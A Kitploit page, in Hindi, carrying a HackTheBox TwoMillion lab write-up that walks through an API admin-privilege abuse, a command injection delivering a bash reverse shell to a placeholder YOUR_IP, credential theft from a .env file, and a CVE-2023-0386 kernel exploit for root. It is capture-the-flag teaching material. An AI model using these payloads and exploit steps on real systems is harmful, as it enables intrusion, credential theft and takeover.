Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
HTB-TwoMillion-Writeup — HackTheBox TwoMillion मशीन राइटअप — API दुरुपयोग, कमांड इंजेक्शन और CVE-2023-0386 | Kitploit
उपकरण/GitHubGitHub/karimelsheikh1/htb-twomillion-writeup
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणपार्श्व आंदोलनवेब एप्लिकेशन शोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
कमांड एंड कंट्रोल
लर्निंग और शिक्षा
GitHubkarimelsheikh1/htb-twomillion-writeup

HTB-TwoMillion-Writeup

HackTheBox TwoMillion मशीन राइटअप — API दुरुपयोग, कमांड इंजेक्शन और CVE-2023-0386

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

HTB-TwoMillion-Writeup

HackTheBox TwoMillion मशीन राइटअप — API दुरुपयोग, कमांड इंजेक्शन और CVE-2023-0386

HackTheBox — TwoMillion राइटअप

HTB Difficulty OS

मशीन जानकारी

फ़ील्डविवरण
नामTwoMillion
कठिनाईआसान
OSLinux
IP10.10.11.221
CVECVE-2023-0386

सारांश

TwoMillion एक आसान Linux मशीन है जो पुराने HackTheBox प्लेटफ़ॉर्म पर आधारित है। इसमें एक आमंत्रण कोड डीकोड करना, API एंडपॉइंट का दुरुपयोग, OS कमांड इंजेक्शन, क्रेडेंशियल खोज, और CVE-2023-0386 (OverlayFS) के माध्यम से Linux कर्नेल विशेषाधिकार वृद्धि शामिल है।


एन्यूमरेशन

Nmap

root@kitploit:~
nmap -sV -sC -v 10.10.11.221

खुले पोर्ट:

  • 22 — OpenSSH 8.9p1
  • 80 — HTTP nginx → 2million.htb पर रीडायरेक्ट

/etc/hosts में जोड़ें:

root@kitploit:~
echo "10.10.11.221 2million.htb" >> /etc/hosts

चरण 1 — आमंत्रण कोड

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/how/to/generate

प्रतिक्रिया ROT13 एन्कोडेड है। इसे डीकोड करें:

root@kitploit:~
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'

आमंत्रण कोड जनरेट करें:

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d

http://2million.htb/register पर डीकोड किए गए आमंत्रण कोड का उपयोग करके रजिस्टर करें।


चरण 2 — API दुरुपयोग → एडमिन

ब्राउज़र से लॉगिन करें, कुकीज़ से PHPSESSID प्राप्त करें (F12 → Application → Cookies)।

एडमिन में अपग्रेड करें:

root@kitploit:~
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"email":"[email protected]","is_admin":1}'

सत्यापित करें:

root@kitploit:~
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}

चरण 3 — कमांड इंजेक्शन → रिवर्स शेल

लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 4444

रिवर्स शेल पेलोड भेजें:

root@kitploit:~
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'

www-data के रूप में शेल प्राप्त हुआ।


चरण 4 — यूज़र फ़्लैग

.env में क्रेडेंशियल खोजें:

root@kitploit:~
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123

SSH से लॉगिन करें:

root@kitploit:~
ssh [email protected]
cat ~/user.txt

चरण 5 — रूट फ़्लैग (CVE-2023-0386)

संकेत देखें:

root@kitploit:~
cat /var/mail/admin
uname -r
# 5.15.70 — CVE-2023-0386 के लिए कमजोर

Kali पर एक्सप्लॉइट डाउनलोड और कंपाइल करें:

root@kitploit:~
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all

लक्ष्य पर स्थानांतरित करें:

root@kitploit:~
# Kali
python3 -m http.server 8000

# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all

लक्ष्य पर दो टर्मिनलों में चलाएँ:

टर्मिनल 1:

root@kitploit:~
./fuse ./ovlcap/lower ./gc

टर्मिनल 2:

root@kitploit:~
./exp

रूट फ़्लैग प्राप्त करें:

root@kitploit:~
cat /root/root.txt

हमला श्रृंखला


उपयोग किए गए उपकरण

  • Nmap
  • curl
  • Netcat
  • CVE-2023-0386 PoC

यह राइटअप केवल सेवानिवृत्त HackTheBox मशीन पर शैक्षिक उद्देश्यों के लिए है।

टूल डाउनलोड करें
चरणतकनीक
खोजNmap स्कैन
आमंत्रण कोडROT13 + Base64 डीकोड
वेब विशेषाधिकार वृद्धिAPI हेरफेर → एडमिन
प्रारंभिक शेलOS कमांड इंजेक्शन
पार्श्व गति.env क्रेडेंशियल्स → SSH
रूटCVE-2023-0386 OverlayFS शोषण